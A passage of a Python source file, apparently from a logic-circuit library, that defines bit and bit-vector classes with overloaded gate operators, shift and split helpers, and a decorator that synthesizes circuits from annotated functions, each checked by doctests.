assembling abstract definitions of logic circuits
and synthesizing circuits from those definitions.
"""
from __future__ import annotations
from typing import Sequence
import doctest
from parts import parts
from circuit import op, gate, circuit, signature
class bit():
"""
Class for representing an abstract bit. Such a bit
can be interpreted concretely as a value, but it is
also used to keep track of relationships between
operators and to represent the wires within a
circuit built up out of those operators.
>>> bit.hook_operation(lambda o, v, *args: None)
>>> bit.circuit(circuit())
>>> b = output(input(1).and_(input(1)))
>>> b.value == bit.circuit().evaluate([1,1])[0]
True
>>> def make_hook(bit_):
... def hook(o, v, *args):
... return bit_.constructor(*args)(v, bit_.gate(o, [a.gate for a in args]))
... return hook
>>> bit.hook_operation(make_hook(bit))
>>> bit.circuit(circuit())
>>> b = output(input(0).and_(input(0)))
>>> b.value == bit.circuit().evaluate([0,0])[0]
True
"""
_circuit = None
_hook_operation = None
@staticmethod
def circuit(circuit_=None):
if circuit_ is not None:
bit._circuit = circuit_
return None
else:
bit._circuit.prune_and_topological_sort_stable()
return bit._circuit
@staticmethod
def hook_operation(hook=None):
bit._hook_operation = hook
@staticmethod
def operation(o, *args):
# Ensure second argument is a `bit`.
args = list(args)
if len(args) == 2:
args[1] = constant(args[1]) if isinstance(args[1], int) else args[1]
# Compute the value of the result of the operation on the arguments.
v = o(*[a.value for a in args])
# Return output from hook if it exists and if
# it returns an output.
if bit._hook_operation is not None:
r = bit._hook_operation(o, v, *args)
if r is not None:
return r
return bit.constructor(*args)(v, bit.gate(o, [a.gate for a in args]))
@staticmethod
def constructor(b1, b2=None):
# The inference code below is not currently in use.
"""
if isinstance(b1, input_one) and isinstance(b2, input_one):
return input_one
elif isinstance(b1, input_two) and isinstance(b2, input_two):
return input_two
elif isinstance(b1, (input_one, input_two)) and b2 is None:
return type(b1)
else:
return bit
"""
return bit
@staticmethod
def gate(operation, igs):
return bit._circuit.gate(operation, igs)
def __init__(self, value, gate_=None):
self.value = value
self.gate = bit._circuit.gate() if gate_ is None else gate_
def __int__(self):
return self.value
def not_(self):
"""
>>> results = []
>>> for x in [0, 1]:
... bit.circuit(circuit())
... b = output(input(x).not_())
... results.append(int(b) == bit.circuit().evaluate([x])[0])
>>> all(results)
True
"""
return bit.operation(op.not_, self)
def __invert__(self):
"""
>>> results = []
>>> for x in [0, 1]:
... bit.circuit(circuit())
... b = output(~input(x))
... results.append(int(b) == bit.circuit().evaluate([x])[0])
>>> all(results)
True
"""
return bit.operation(op.not_, self)
def __rsub__(self, other):
"""
>>> results = []
>>> for x in [0, 1]:
... bit.circuit(circuit())
... b = output(1 - input(x))
... results.append(int(b) == bit.circuit().evaluate([x])[0])
>>> all(results)
True
>>> bit.circuit(circuit())
>>> 2 - input(0)
Traceback (most recent call last):
...
ValueError: can only subtract a bit from the integer 1
"""
if other == 1:
return bit.operation(op.not_, self)
raise ValueError('can only subtract a bit from the integer 1')
def and_(self, other):
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... b = output(input(x).and_(input(y)))
... results.append(int(b) == bit.circuit().evaluate([x,y])[0])
>>> all(results)
True
"""
return bit.operation(op.and_, self, other)
def __and__(self, other):
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... b = output(input(x) & input(y))
... results.append(int(b) == bit.circuit().evaluate([x,y])[0])
>>> all(results)
True
"""
return bit.operation(op.and_, self, other)
def __rand__(self, other):
"""
>>> bit.circuit(circuit())
>>> b = 0 & constant(1)
>>> b.value
0
"""
return self & (constant(other) if isinstance(other, int) else other)
def nimp(self, other):
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... b = output(input(x).nimp(input(y)))
... results.append(int(b) == bit.circuit().evaluate([x,y])[0])
>>> all(results)
True
"""
return bit.operation(op.nimp_, self, other)
def nimp_(self, other):
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... b = output(input(x).nimp_(input(y)))
... results.append(int(b) == bit.circuit().evaluate([x,y])[0])
>>> all(results)
True
"""
return bit.operation(op.nimp_, self, other)
def __gt__(self, other):
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... b = output(input(x) > input(y))
... results.append(int(b) == bit.circuit().evaluate([x,y])[0])
>>> all(results)
True
"""
return self.nimp(other)
def nif(self, other):
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... b = output(input(x).nif(input(y)))
... results.append(int(b) == bit.circuit().evaluate([x,y])[0])
>>> all(results)
True
"""
return bit.operation(op.nif_, self, other)
def nif_(self, other):
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... b = output(input(x).nif_(input(y)))
... results.append(int(b) == bit.circuit().evaluate([x,y])[0])
>>> all(results)
True
"""
return bit.operation(op.nif_, self, other)
def __lt__(self, other):
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... b = output(input(x) < input(y))
... results.append(int(b) == bit.circuit().evaluate([x,y])[0])
>>> all(results)
True
"""
return self.nif(other)
def xor(self, other):
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... b = output(input(x).xor(input(y)))
... results.append(int(b) == bit.circuit().evaluate([x,y])[0])
>>> all(results)
True
"""
return bit.operation(op.xor_, self, other)
def xor_(self, other):
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... b = output(input(x).xor_(input(y)))
... results.append(int(b) == bit.circuit().evaluate([x,y])[0])
>>> all(results)
True
"""
return bit.operation(op.xor_, self, other)
def __xor__(self, other):
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... b = output(input(x) ^ input(y))
... results.append(int(b) == bit.circuit().evaluate([x,y])[0])
>>> all(results)
True
"""
return bit.operation(op.xor_, self, other)
def __rxor__(self, other):
"""
>>> bit.circuit(circuit())
>>> b = 1 ^ constant(0)
>>> b.value
1
"""
return self ^ (constant(other) if isinstance(other, int) else other)
def or_(self, other):
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... b = output(input(x).or_(input(y)))
... results.append(int(b) == bit.circuit().evaluate([x,y])[0])
>>> all(results)
True
"""
return bit.operation(op.or_, self, other)
def __or__(self, other):
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... b = output(input(x) | input(y))
... results.append(int(b) == bit.circuit().evaluate([x,y])[0])
>>> all(results)
True
"""
return bit.operation(op.or_, self, other)
def __ror__(self, other):
"""
>>> bit.circuit(circuit())
>>> b = 1 | constant(0)
>>> b.value
1
"""
return self | (constant(other) if isinstance(other, int) else other)
def nor(self, other):
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... b = output(input(x).nor(input(y)))
... results.append(int(b) == bit.circuit().evaluate([x,y])[0])
>>> all(results)
True
"""
return bit.operation(op.nor_, self, other)
def nor_(self, other):
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... b = output(input(x).nor_(input(y)))
... results.append(int(b) == bit.circuit().evaluate([x,y])[0])
>>> all(results)
True
"""
return bit.operation(op.nor_, self, other)
def __mod__(self, other):
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... b = output(input(x) % input(y))
... results.append(int(b) == bit.circuit().evaluate([x,y])[0])
>>> all(results)
True
"""
return bit.operation(op.nor_, self, other)
def xnor(self, other):
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... b = output(input(x).xnor(input(y)))
... results.append(int(b) == bit.circuit().evaluate([x,y])[0])
>>> all(results)
True
"""
return bit.operation(op.xnor_, self, other)
def xnor_(self, other):
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... b = output(input(x).xnor_(input(y)))
... results.append(int(b) == bit.circuit().evaluate([x,y])[0])
>>> all(results)
True
"""
return bit.operation(op.xnor_, self, other)
def __eq__(self, other):
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... b = output(input(x) == input(y))
... results.append(int(b) == bit.circuit().evaluate([x,y])[0])
>>> all(results)
True
"""
return bit.operation(op.xnor_, self, other)
def if_(self, other):
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... b = output(input(x).if_(input(y)))
... results.append(int(b) == bit.circuit().evaluate([x,y])[0])
>>> all(results)
True
"""
return bit.operation(op.if_, self, other)
def __ge__(self, other):
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... b = output(input(x) >= input(y))
... results.append(int(b) == bit.circuit().evaluate([x,y])[0])
>>> all(results)
True
"""
return bit.operation(op.if_, self, other)
def imp(self, other):
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... b = output(input(x).imp(input(y)))
... results.append(int(b) == bit.circuit().evaluate([x,y])[0])
>>> all(results)
True
"""
return bit.operation(op.imp_, self, other)
def imp_(self, other):
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... b = output(input(x).imp_(input(y)))
... results.append(int(b) == bit.circuit().evaluate([x,y])[0])
>>> all(results)
True
"""
return bit.operation(op.imp_, self, other)
def __le__(self, other):
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... b = output(input(x) <= input(y))
... results.append(int(b) == bit.circuit().evaluate([x,y])[0])
>>> all(results)
True
"""
return bit.operation(op.imp_, self, other)
def nand(self, other):
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... b = output(input(x).nand(input(y)))
... results.append(int(b) == bit.circuit().evaluate([x,y])[0])
>>> all(results)
True
"""
return bit.operation(op.nand_, self, other)
def nand_(self, other):
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... b = output(input(x).nand_(input(y)))
... results.append(int(b) == bit.circuit().evaluate([x,y])[0])
>>> all(results)
True
"""
return bit.operation(op.nand_, self, other)
def __matmul__(self, other):
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... b = output(input(x) @ input(y))
... results.append(int(b) == bit.circuit().evaluate([x,y])[0])
>>> all(results)
True
"""
return bit.operation(op.nand_, self, other)
class constant(bit):
"""Bit that is designated as a constant input."""
class input(bit):
"""Bit that is designated as a variable input."""
def __init__(self: bit, value: int):
self.value = value
self.gate = bit._circuit.gate(op.id_, is_input=True)
class input_one(input):
"""Bit that is designated as a variable input from one source."""
class input_two(input):
"""Bit that is designated as a variable input from a second source."""
class output(bit):
"""
Bit that is designated an output.
>>> bit.circuit(circuit())
>>> b0 = output(input(1).not_())
>>> b1 = output(b0.not_())
>>> b2 = output(b0)
>>> [b0.value, b1.value, b2.value]
[0, 1, 0]
"""
def __init__(self: bit, b: bit):
# Check if bit is ready as final output or whether there are others dependent on it.
if len(b.gate.outputs) > 0:
b = ~(~b) # Preserve the bit by copying it to a new wire.
self.value = b.value
self.gate = bit._circuit.gate(op.id_, [b.gate], is_output=True)
class bits_type(int): # pylint: disable=R0903
"""
Class for representing an input or output type of a
function decorated for automated synthesis.
"""
class bits(list):
"""
Class for representing a vector of abstract bits.
"""
@staticmethod
def from_byte(byte_: int, constructor=bit) -> bits:
return bits([
constructor(bit_)
for bit_ in reversed([(byte_>>i)%2 for i in range(8)])
])
@staticmethod
def from_bytes(bytes_, constructor=bit) -> bits:
"""
>>> bit.circuit(circuit())
>>> [b.value for b in bits.from_bytes(bytes([255]))]
[1, 1, 1, 1, 1, 1, 1, 1]
>>> bit.circuit(circuit())
>>> [b.value for b in bits.from_bytes(bytes([11, 0]))]
[0, 0, 0, 0, 1, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0]
"""
return bits([
bit_
for byte_ in bytes_
for bit_ in bits.from_byte(byte_, constructor)
])
@staticmethod
def zeros(n: int) -> bits:
"""
>>> bit.circuit(circuit())
>>> xs = bits.zeros(3)
>>> ys = outputs(xs.not_())
>>> [y.value for y in ys]
[1, 1, 1]
"""
return bits([constant(0)]*n)
def __new__(cls, argument = None) -> bits:
"""
Return bits object given the supplied argument.
"""
return bits_type(argument)\
if isinstance(argument, int) else\
list.__new__(cls, argument)
def __int__(self: bits) -> int:
"""
>>> bit.circuit(circuit())
>>> xs = constants([0, 0, 0])
>>> ys = outputs(xs.not_())
>>> int(ys)
7
"""
return sum(int(b)*(2**i) for (i, b) in zip(range(len(self)), reversed(self)))
def not_(self: bits) -> bits:
"""
>>> results = []
>>> for x in [0, 1]:
... bit.circuit(circuit())
... xs = inputs([x, x, x])
... ys = outputs(xs.not_())
... ns = [int(y) for y in ys]
... c = bit.circuit()
... results.append(ns == c.evaluate([x, x, x]))
>>> all(results)
True
"""
return bits([x.not_() for x in self])
def __invert__(self: bits) -> bits:
"""
>>> results = []
>>> for x in [0, 1]:
... bit.circuit(circuit())
... xs = inputs([x, x, x])
... ys = outputs(~xs)
... ns = [int(y) for y in ys]
... c = bit.circuit()
... results.append(ns == c.evaluate([x, x, x]))
>>> all(results)
True
"""
return bits([x.not_() for x in self])
def and_(self: bits, other: bits) -> bits:
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... (xs, ys) = (inputs([x, x, x]), inputs([y, y, y]))
... zs = outputs(xs.and_(ys))
... ns = [int(z) for z in zs]
... c = bit.circuit()
... results.append(ns == c.evaluate([x, x, x, y, y, y]))
>>> all(results)
True
"""
return bits([x.and_(y) for (x, y) in zip(self, other)])
def __and__(self: bits, other: bits) -> bits:
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... (xs, ys) = (inputs([x, x, x]), inputs([y, y, y]))
... zs = outputs(xs & ys)
... ns = [int(z) for z in zs]
... c = bit.circuit()
... results.append(ns == c.evaluate([x, x, x, y, y, y]))
>>> all(results)
True
"""
return bits([x.and_(y) for (x, y) in zip(self, other)])
def nimp(self: bits, other: bits) -> bits:
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... (xs, ys) = (inputs([x, x, x]), inputs([y, y, y]))
... zs = outputs(xs.nimp(ys))
... ns = [int(z) for z in zs]
... c = bit.circuit()
... results.append(ns == c.evaluate([x, x, x, y, y, y]))
>>> all(results)
True
"""
return bits([x.nimp_(y) for (x, y) in zip(self, other)])
def nimp_(self: bits, other: bits) -> bits:
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... (xs, ys) = (inputs([x, x, x]), inputs([y, y, y]))
... zs = outputs(xs.nimp_(ys))
... ns = [int(z) for z in zs]
... c = bit.circuit()
... results.append(ns == c.evaluate([x, x, x, y, y, y]))
>>> all(results)
True
"""
return bits([x.nimp_(y) for (x, y) in zip(self, other)])
def __gt__(self: bits, other: bits) -> bits:
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... (xs, ys) = (inputs([x, x, x]), inputs([y, y, y]))
... zs = outputs(xs > ys)
... ns = [int(z) for z in zs]
... c = bit.circuit()
... results.append(ns == c.evaluate([x, x, x, y, y, y]))
>>> all(results)
True
"""
return bits([x.nimp_(y) for (x, y) in zip(self, other)])
def nif(self: bits, other: bits) -> bits:
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... (xs, ys) = (inputs([x, x, x]), inputs([y, y, y]))
... zs = outputs(xs.nif(ys))
... ns = [int(z) for z in zs]
... c = bit.circuit()
... results.append(ns == c.evaluate([x, x, x, y, y, y]))
>>> all(results)
True
"""
return bits([x.nif_(y) for (x, y) in zip(self, other)])
def nif_(self: bits, other: bits) -> bits:
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... (xs, ys) = (inputs([x, x, x]), inputs([y, y, y]))
... zs = outputs(xs.nif_(ys))
... ns = [int(z) for z in zs]
... c = bit.circuit()
... results.append(ns == c.evaluate([x, x, x, y, y, y]))
>>> all(results)
True
"""
return bits([x.nif_(y) for (x, y) in zip(self, other)])
def __lt__(self: bits, other: bits) -> bits:
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... (xs, ys) = (inputs([x, x, x]), inputs([y, y, y]))
... zs = outputs(xs < ys)
... ns = [int(z) for z in zs]
... c = bit.circuit()
... results.append(ns == c.evaluate([x, x, x, y, y, y]))
>>> all(results)
True
"""
return bits([x.nif_(y) for (x, y) in zip(self, other)])
def xor(self: bits, other: bits) -> bits:
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... (xs, ys) = (inputs([x, x, x]), inputs([y, y, y]))
... zs = outputs(xs.xor(ys))
... ns = [int(z) for z in zs]
... c = bit.circuit()
... results.append(ns == c.evaluate([x, x, x, y, y, y]))
>>> all(results)
True
"""
return bits([x.xor_(y) for (x, y) in zip(self, other)])
def xor_(self: bits, other: bits) -> bits:
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... (xs, ys) = (inputs([x, x, x]), inputs([y, y, y]))
... zs = outputs(xs.xor_(ys))
... ns = [int(z) for z in zs]
... c = bit.circuit()
... results.append(ns == c.evaluate([x, x, x, y, y, y]))
>>> all(results)
True
"""
return bits([x.xor_(y) for (x, y) in zip(self, other)])
def __xor__(self: bits, other: bits) -> bits:
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... (xs, ys) = (inputs([x, x, x]), inputs([y, y, y]))
... zs = outputs(xs ^ ys)
... ns = [int(z) for z in zs]
... c = bit.circuit()
... results.append(ns == c.evaluate([x, x, x, y, y, y]))
>>> all(results)
True
"""
return bits([x.xor_(y) for (x, y) in zip(self, other)])
def or_(self: bits, other: bits) -> bits:
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... (xs, ys) = (inputs([x, x, x]), inputs([y, y, y]))
... zs = outputs(xs.or_(ys))
... ns = [int(z) for z in zs]
... c = bit.circuit()
... results.append(ns == c.evaluate([x, x, x, y, y, y]))
>>> all(results)
True
"""
return bits([x.or_(y) for (x, y) in zip(self, other)])
def __or__(self: bits, other: bits) -> bits:
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... (xs, ys) = (inputs([x, x, x]), inputs([y, y, y]))
... zs = outputs(xs | ys)
... ns = [int(z) for z in zs]
... c = bit.circuit()
... results.append(ns == c.evaluate([x, x, x, y, y, y]))
>>> all(results)
True
"""
return bits([x.or_(y) for (x, y) in zip(self, other)])
def nor(self: bits, other: bits) -> bits:
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... (xs, ys) = (inputs([x, x, x]), inputs([y, y, y]))
... zs = outputs(xs.nor(ys))
... ns = [int(z) for z in zs]
... c = bit.circuit()
... results.append(ns == c.evaluate([x, x, x, y, y, y]))
>>> all(results)
True
"""
return bits([x.nor_(y) for (x, y) in zip(self, other)])
def nor_(self: bits, other: bits) -> bits:
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... (xs, ys) = (inputs([x, x, x]), inputs([y, y, y]))
... zs = outputs(xs.nor_(ys))
... ns = [int(z) for z in zs]
... c = bit.circuit()
... results.append(ns == c.evaluate([x, x, x, y, y, y]))
>>> all(results)
True
"""
return bits([x.nor_(y) for (x, y) in zip(self, other)])
def __mod__(self, other) -> bits:
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... (xs, ys) = (inputs([x, x, x]), inputs([y, y, y]))
... zs = outputs(xs % ys)
... ns = [int(z) for z in zs]
... c = bit.circuit()
... results.append(ns == c.evaluate([x, x, x, y, y, y]))
>>> all(results)
True
"""
return bits([x.nor_(y) for (x, y) in zip(self, other)])
def xnor(self: bits, other: bits) -> bits:
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... (xs, ys) = (inputs([x, x, x]), inputs([y, y, y]))
... zs = outputs(xs.xnor(ys))
... ns = [int(z) for z in zs]
... c = bit.circuit()
... results.append(ns == c.evaluate([x, x, x, y, y, y]))
>>> all(results)
True
"""
return bits([x.xnor_(y) for (x, y) in zip(self, other)])
def xnor_(self: bits, other: bits) -> bits:
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... (xs, ys) = (inputs([x, x, x]), inputs([y, y, y]))
... zs = outputs(xs.xnor_(ys))
... ns = [int(z) for z in zs]
... c = bit.circuit()
... results.append(ns == c.evaluate([x, x, x, y, y, y]))
>>> all(results)
True
"""
return bits([x.xnor_(y) for (x, y) in zip(self, other)])
def __eq__(self: bits, other: bits) -> bits:
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... (xs, ys) = (inputs([x, x, x]), inputs([y, y, y]))
... zs = outputs(xs == ys)
... ns = [int(z) for z in zs]
... c = bit.circuit()
... results.append(ns == c.evaluate([x, x, x, y, y, y]))
>>> all(results)
True
"""
return bits([x.xnor_(y) for (x, y) in zip(self, other)])
def if_(self: bits, other: bits) -> bits:
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... (xs, ys) = (inputs([x, x, x]), inputs([y, y, y]))
... zs = outputs(xs.if_(ys))
... ns = [int(z) for z in zs]
... c = bit.circuit()
... results.append(ns == c.evaluate([x, x, x, y, y, y]))
>>> all(results)
True
"""
return bits([x.if_(y) for (x, y) in zip(self, other)])
def __ge__(self: bits, other: bits) -> bits:
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... (xs, ys) = (inputs([x, x, x]), inputs([y, y, y]))
... zs = outputs(xs >= ys)
... ns = [int(z) for z in zs]
... c = bit.circuit()
... results.append(ns == c.evaluate([x, x, x, y, y, y]))
>>> all(results)
True
"""
return bits([x.if_(y) for (x, y) in zip(self, other)])
def imp(self: bits, other: bits) -> bits:
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... (xs, ys) = (inputs([x, x, x]), inputs([y, y, y]))
... zs = outputs(xs.imp(ys))
... ns = [int(z) for z in zs]
... c = bit.circuit()
... results.append(ns == c.evaluate([x, x, x, y, y, y]))
>>> all(results)
True
"""
return bits([x.imp_(y) for (x, y) in zip(self, other)])
def imp_(self: bits, other: bits) -> bits:
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... (xs, ys) = (inputs([x, x, x]), inputs([y, y, y]))
... zs = outputs(xs.imp_(ys))
... ns = [int(z) for z in zs]
... c = bit.circuit()
... results.append(ns == c.evaluate([x, x, x, y, y, y]))
>>> all(results)
True
"""
return bits([x.imp_(y) for (x, y) in zip(self, other)])
def __le__(self: bits, other: bits) -> bits:
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... (xs, ys) = (inputs([x, x, x]), inputs([y, y, y]))
... zs = outputs(xs <= ys)
... ns = [int(z) for z in zs]
... c = bit.circuit()
... results.append(ns == c.evaluate([x, x, x, y, y, y]))
>>> all(results)
True
"""
return bits([x.imp_(y) for (x, y) in zip(self, other)])
def nand(self: bits, other) -> bits:
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... (xs, ys) = (inputs([x, x, x]), inputs([y, y, y]))
... zs = outputs(xs.nand(ys))
... ns = [int(z) for z in zs]
... c = bit.circuit()
... results.append(ns == c.evaluate([x, x, x, y, y, y]))
>>> all(results)
True
"""
return bits([x.nand_(y) for (x, y) in zip(self, other)])
def nand_(self: bits, other) -> bits:
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... (xs, ys) = (inputs([x, x, x]), inputs([y, y, y]))
... zs = outputs(xs.nand_(ys))
... ns = [int(z) for z in zs]
... c = bit.circuit()
... results.append(ns == c.evaluate([x, x, x, y, y, y]))
>>> all(results)
True
"""
return bits([x.nand_(y) for (x, y) in zip(self, other)])
def __rshift__(self: bits, other) -> bits:
"""
Overloaded operator: rotation and shift operations.
>>> bit.circuit(circuit())
>>> bs = bits(map(bit, [1,1,1,1,0,0,0,0]))
>>> bs = bs >> 3
>>> [b.value for b in bs]
[0, 0, 0, 1, 1, 1, 1, 0]
>>> bit.circuit(circuit())
>>> bs = bits(map(bit, [0,0,0,0,1,1,1,1]))
>>> bs = bs >> {3}
>>> [b.value for b in bs]
[1, 1, 1, 0, 0, 0, 0, 1]
"""
if isinstance(other, set) and isinstance(list(other)[0], int): # Rotation.
quantity = list(other)[0]
return bits(self[len(self)-quantity:]) ** bits(self[0:len(self)-quantity])
else: # Shift
return bits([constant(0)]*other) ** bits(self[0:len(self)-other])
def __lshift__(self: bits, other) -> bits:
"""
>>> bit.circuit(circuit())
>>> bs = bits(map(bit, [1,1,1,1,0,0,0,0]))
>>> bs = bs << 3
>>> [b.value for b in bs]
[1, 0, 0, 0, 0, 0, 0, 0]
"""
return bits(self[other:]) ** bits([constant(0) for _ in range(other)])
def __truediv__(self: bits, other) -> Sequence[bits]:
"""
>>> bit.circuit(circuit())
>>> bs = bits(map(bit, [1,1,1,1,0,0,0,0]))
>>> bss = list(bs / 2)
>>> ([b.value for b in bss[0]], [b.value for b in bss[1]])
([1, 1, 1, 1], [0, 0, 0, 0])
>>> bit.circuit(circuit())
>>> bs = bits(map(bit, [1,1,1,1,0,0,0,0]))
>>> bss = list(bs / {2})
>>> [[b.value for b in bs] for bs in bss]
[[1, 1], [1, 1], [0, 0], [0, 0]]
>>> bit.circuit(circuit())
>>> bs = bits(map(bit, [1,1,1,1,0,0,0,0]))
>>> bss = list(bs / [1, 3, 4])
>>> [[b.value for b in bs] for bs in bss]
[[1], [1, 1, 1], [0, 0, 0, 0]]
"""
if isinstance(other, list) and len(other) > 0 and isinstance(other[0], int):
return map(bits, parts(self, length=other)) # Sequence of lengths.
elif isinstance(other, set) and len(other) == 1 and isinstance(list(other)[0], int):
return self / (len(self)//list(other)[0]) # Parts of length `other`.
else:
return map(bits, parts(self, other)) # Number of parts is `other`.
def __add__(self: bits, other) -> bits:
"""Concatenation of bit vectors."""
result = list(self)
result.extend(list(other))
return bits(result)
def __pow__(self: bits, other) -> bits:
"""Concatenation of bit vectors."""
return self + other
def constants(l):
return bits(map(constant, l))
def inputs(l):
return bits(map(input, l))
def outputs(l):
return bits(map(output, l))
def synthesize(f):
"""
Decorator for automatically synthesizing a circuit from a
function that takes only `bit` and/or `bits` objects as its
arguments and returns an output of type `bit` or `bits`.
>>> @synthesize
... def equal(x: bit, y: bit) -> bit:
... return (x & y) | ((1 - x) & (1 - y))
>>> xys = [bits([x, y]) for x in (0, 1) for y in (0, 1)]
>>> [equal.circuit.evaluate(xy) for xy in xys]
[[1], [0], [0], [1]]
>>> @synthesize
... def conjunction(xy: bits(2)) -> bits(2):
... return (xy[0], xy[0] & xy[1])
>>> xys = [bits([x, y]) for x in (0, 1) for y in (0, 1)]
>>> [conjunction.circuit.evaluate(xy) for xy in xys]
[[0, 0], [0, 0], [1, 0], [1, 1]]
>>> @synthesize
... def equal(x, y):
... return x & y
Traceback (most recent call last):
...
RuntimeError: automated circuit synthesis failed
"""
# Functions for determining types/signature from
# the type annotation of the decorated function.
type_in = lambda a: input(0) if a is bit else inputs([0] * a)
type_out = lambda a: output if a is bit else outputs
# For forward-compatibility with PEP 563.
eval_ = lambda a: eval(a) if isinstance(a, str) else a # pylint: disable=W0123
try:
# Construct the circuit and add it to the function as an attribute.
bit.circuit(circuit())
args_in = {
k: type_in(eval_(a))
for (k, a) in f.__annotations__.items() if k != 'return'
}
type_out(eval_(f.__annotations__['return']))(f(**args_in))
f.circuit = bit.circuit()
except:
raise RuntimeError('automated circuit synthesis failed') from None
# Return the original function.
return f
